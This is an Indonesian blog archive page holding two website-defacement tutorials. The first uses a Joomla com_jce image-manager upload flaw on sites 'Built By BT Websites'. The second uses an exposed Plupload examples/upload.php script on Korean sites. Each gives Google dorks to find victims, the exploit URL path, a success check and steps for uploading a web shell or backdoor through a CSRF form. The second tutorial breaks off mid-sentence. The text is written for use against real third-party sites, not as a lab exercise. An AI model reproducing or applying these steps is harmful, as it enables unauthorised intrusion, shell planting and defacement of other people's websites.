Postingan

Menampilkan postingan dari Januari, 2019

Joomla BT Websites vulnerability com_jce with csrf

Gambar
Joomla BT Websites vulnerability com_jce with csrf Dork   : intext:"Built By BT Websites" Exploit :  index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 Csrf :  pastebin Dorking dlu, anggap ae dah dapet target Buat yg gamau ribet langsung make bot ae Tambah exploit Contoh site,com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 Vuln?  {"result":null,"error":"No function call specified!"} Masukin target ke csrf  Upload file gif/jpg/png cek file di site,com/shell.gif Ok gitu doang

Deface metode Plupload Vulnerability File Upload situs Korea (upload shell)

Gambar
Hey gan kali gw akan share deface metode Plupload terbaru, ok langsung simak aja Bahan2 yg dibutuhin - Hp / Pc - Internet (ya iya lah) - Csrf  click me Oh iya filetype di csrf bisa diganti misal : shell.php simpan csrf ext:html/htm - Exploit plupload/examples/upload.php - Dork inul:/plupload site:kr inurl:/plupload/examples/upload.php site:kr Kembangin lagi biar dapet web yang vuln Ok langsung aja (perhatikan baik2) Cari di gambar ya Misal seperti ini Masuk ke web nya Klik gambar tadi yang sebelum masuk web Lihat gambar / open new tab bila sudah, lanjut Hapus tambahkan Exploit nya /plupload/examples/upload.php Misal http://target.kr/data/plupload/p1bhh6i89s1lehk1i1k1jbd1ptd1.jpg hapus masuk kan Exploit jadi http://target.kr/plupload/examples/upload.php Bila sudah akan seperti ini Copy link pastekan / tempel ke csrf tadi Bila sudah upload backdoor / shell kalian Tunggu hingga loading selesai  Bila vuln maka